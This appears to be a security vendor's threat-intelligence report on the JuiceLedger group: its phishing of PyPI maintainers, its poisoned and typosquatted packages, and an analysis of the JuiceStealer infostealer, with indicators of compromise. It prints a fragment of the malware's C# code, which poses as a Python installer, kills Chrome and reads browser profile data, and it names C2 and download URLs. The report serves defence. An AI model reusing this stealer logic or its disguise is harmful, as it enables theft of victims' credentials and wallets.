Executive Summary

• JuiceLedger is a relativey new threat actor focused on infostealing through a .NET assembly called ‘JuiceStealer’
• JuiceLedger has rapidly evolved its attack chain from fraudulent applications to supply chain attacks in little over 6 months
• In August, JuiceLedger conducted a phishing campaign against PyPI contributors and successfully compromised a number of  legitimate packages
• Hundreds of typosquatting packages delivering JuiceStealer malware have been identified
• At least two packages with combined downloads of almost 700,000 were compromised
• PyPI says that known malicious packages and typosquats have now been removed or taken down

Overview

SentinelLabs, in collaboration with Checkmarx, has been tracking the activity and evolution of a threat actor dubbed “JuiceLedger”. In early 2022, JuiceLedger began running relatively low-key campaigns, spreading fraudulent Python installer applications with ‘JuiceStealer’, a .NET application designed to steal sensitive data from victims’ browsers. In August 2022, the threat actor engaged in poisoning open-source packages as a way to target a wider audience with the infostealer through a supply chain attack, raising the threat level posed by this group considerably.

JuiceLedger operators have actively targeted PyPi package contributors in a phishing campaign, successfully poisoning at least two legitimate packages with malware. Several hundred more malicious packages are known to have been typosquatted.

In this post, we detail the evolution of JuiceLedger, describe the group’s attack vectors and activity, and provide an analysis of the JuiceStealer payload.

Dual Pronged Attack – Fake Apps and Supply Chain Attacks

The supply chain attack on PyPi package contributors appears to be an escalation of a campaign begun earlier in the year which initially targeted potential victims through fake cryptocurrency trading applications, among them a bot the threat actors marketed as an “AI Crypto trading bot” named “The Tesla Trading bot”.

The attack on PyPI in August involves a far more complex attack chain, including phishing emails to PyPI developers, typosquatting, and malicious packages intended to infect downstream users with the JuiceStealer malware. This vector seems to be utilized in parallel to the earlier JuiceLedger infection method, as similar payloads were delivered around the same time through fake cryptocurrency ledger websites.

Targeting PyPI Contributors

On August 24, 2022, PyPi published details of an ongoing phishing campaign targeting PyPi users. According to their report, this is the first known phishing attack against PyPI. The phishing email states that a mandatory ‘validation’ process requires the contributor to validate their package or risk having it removed from PyPI.

The phishing emails point victims to a Google site’s landing page mimicking the PyPI login page. The credentials provided there were sent to a known JuiceLedger domain: linkedopports[.]com.

Some of those phishing attacks appear to have been successful, leading to the compromise of legitimate code packages whose contributors credentials were compromised.

PyPI also reported that they had found a number of typosquatting packages that conformed to a similar pattern; JuiceLedger has also used typosquatting to deliver its malicious applications.

Typosquatting popular code packages is nothing new. Reports of similar attacks have emerged during the last few years, including the CrateDepression campaign targeting Rust developers and recently reported by SentinelLabs.

Compromised packages uploaded by JuiceLedger in the August campaign contain a short code snippet, responsible for downloading and executing a signed variant of JuiceStealer. The malicious code added is depicted below.

The code snippet added to those packages is quite similar to the ones added in the typosquatting packages. According to PyPI, the malicious code snippets were found on the following packages:

 exotel==0.1.6
 spam==2.0.2 and ==4.0.2

A look at the code snippet from compromised packages suggests that the actors added an indication of the compromised package in the registration URL:

A snippet from exotel poisoned code. Source: PyPi via Twitter

JuiceLedger’s August campaign also contained a Ledger-themed fraudulent application. Users of Ledger, a hardware “cold storage” wallet technology for crypto assets, have been targeted with a digitally-signed version of JuiceStealer embedded in fake Ledger installation packs.

The certificate 13CFDF20DFA846C94358DBAC6A3802DC0671EAB2 was used to sign a total of four samples, one of which appears to be unrelated, although all are malicious.

Analysis of JuiceStealer Malware

JuiceLedger’s infostealer, dubbed JuiceStealer, is a relatively simple .NET application, internally named “meta”. First indications of the stealer started emerging in February this year. Over several iterations, the infostealer was embedded in a number of fraudulent applications and installers.

Python Installers

The first version of JuiceStealer (d249f19db3fe6ea4439f095bfe7aafd5a0a5d4d2), uploaded to VirusTotal on February 13, appears to be incomplete and may be a test submitted by the developers. It is the first in a set of variants mimicking Python installers.

This sample iterates over processes containing the word “chrome”, shuts them down and then searches for Google Chrome Extension log files. The infostealer iterates over logs that contain the word “vault”, possibly searching for cryptocurrency vaults, and reports back to an embedded C2 server over HTTP.

private static void Main(string[] args)
{
  Console.WriteLine("Please wait while Python installs...");
  string[] directories = Directory.GetDirectories("C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Google\\Chrome\\User Data");
  foreach (Process process in Process.GetProcessesByName("chrome"))
  process.Kill();
  Thread.Sleep(2500);
  Console.WriteLine("Python is almost ready...");

A fully fledged version of the fraudulent installer was submitted a few days later as part of a zip file named “python-v23.zip” (1a7464489568003173cd048a3bad41ca32dbf94f), containing a newer version of the infostealer, a legitimate Python installer and an instruction file, “INSTRUCTIONS.exe”.

This version of the infostealer introduces a new class, named ‘Juice’ (hence the name), and also searches for Google Chrome passwords, querying Chrome SQLite files. It also launches a Python installer contained in the zip named “config.exe”. Naming legitimate software “config.exe” appears to be common in various JuiceStealer variants.

Like many of the JuiceStealer samples we analyzed, it was compiled as a self-contained .NET app. This makes the files significantly larger.

A pdb path common to many earlier versions of the JuiceStealer contains the user name “reece” and internal project name “meta”.

C:\Users\reece\source\repos\meta\meta\obj\Release\netcoreapp3.1\win-x86\meta.pdb

Evolution of JuiceStealer

Pivoting off the pdb paths observed, we were able to link additional activities to JuiceLedger. Those, together with our additional findings of the development phases of JuiceStealer, suggest the group began operating in late 2021.

Pre-JuiceStealer Fake Installers

On January 30, a set of three fake installers compiled as self-contained applications were uploaded to VirusTotal from the submitter f40316fe, located in GB. The same submitter also uploaded the first variant of JuiceStealer, which also appears to be a test. All the fake installers had a similar pdb path, containing the username “reece”, and appear to be the threat actor’s first iterations of the JuiceStelaer.

C:\Users\reece\source\repos\install-python\install-python\obj\Release\netcoreapp3.1\win-x86\install-python.pdb

Nowblox Scam Website

Throughout the research, we came across a possible connection to Nowblox, a scam website that operated in 2021, offering free Robux. Several applications named “Nowblox.exe” were systematically uploaded to VirusTotal from submitters in GB, all with the following pdb path:

C:\\Users\\reece\\source\\repos\\Nowblox\\Nowblox\\obj\\Debug\\Nowblox.pdb

While the path on its own is not a very strong indication, we came across another link to Nowblox in our research, in the form of a file named “NowbloxCodes.iso”(5eb92c45e0700d80dc24d3ad07a7e2d5b030c933). The use of an ISO file might suggest it was sent out in a phishing email, as ISO files have become a popular attack vector for bypassing email security products. However, we have no data to validate this.

The file contains an LNK file (e5286353dec9a7fc0c6db378b407e0293b711e9b), triggering the execution of an obfuscated PowerShell command, which in turn runs mstha to load an .HTA file from hxxps://rblxdem[.]com/brace.hta, which is currently offline.

The domain rblxdem[.]com is hosted on 45.153.35[.]53, which was used to host several Ledger phishing domains as well as a JuiceStealer C2 domain thefutzibag[.]com, providing another possible link to JuiceLedger.

Fraudulent Apps – The Tesla Trading Bot

Over time, JuiceLedger operators started using direct crypto-themed fraudulent applications, among them, an application they named “Tesla Trading bot”. Delivered in a similar scheme to the Python installer, it was embedded within a zip file with additional legitimate software. The JuiceStealer has evolved significantly during this period, adding support both for additional browsers as well as Discord.

The embedded instructions message is very similar to the one found in the fake Python installer, prompting users to disable their security solutions.

While the delivery mechanism remains unclear, it seems JuiceLedger operators maintained a website for the fake trading bot, prompting users to download the fraudulent application.

PyPI Response

PyPI have stated that they are actively reviewing reports of malicious packages and have taken down several hundred typosquats. Package maintainers are urged to use 2FA authorization on their accounts where available and to confirm that the URL in the address bar is http://pypi.org when entering credentials. Users can also check that the site’s TLS certificate is issued to pypi.org.

Maintainers who believe they may have been victim of a JuiceLedger attack are advised to reset passwords immediately and to report any suspicious activity to [email protected]

Conclusion

JuiceLedger appears to have evolved very quickly from opportunistic, small-scale infections only a few months ago to conducting a supply chain attack on a major software distributor. The escalation in complexity in the attack on PyPI contributors, involving a targeted phishing campaign, hundreds of typosquatted packages and account takeovers of trusted developers, indicates that the threat actor has time and resources at their disposal.

Given the widespread use of PyPI and other open source packages in enterprise environments, attacks such as these are a cause of concern and security teams are urged to review the provided indicators and take appropriate mitigation measures.

Indicators of Compromise

Fake Python installers
90b7da4c4a51c631bd0cbe8709635b73de7f7290
dd569ccfe61921ab60323a550cc7c8edf8fb51d8
97c541c6915ccbbc8c2b0bc243127db9b43d4b34
f29a339e904c6a83dbacd8393f57126b67bdd3dd
71c849fc30c1abdb49c35786c86499acbb875eb5
2fb194bdae05c259102274300060479adf3b222e

Nowblox ISO file
5eb92c45e0700d80dc24d3ad07a7e2d5b030c933
e5286353dec9a7fc0c6db378b407e0293b711e9b

CryptoJuice Samples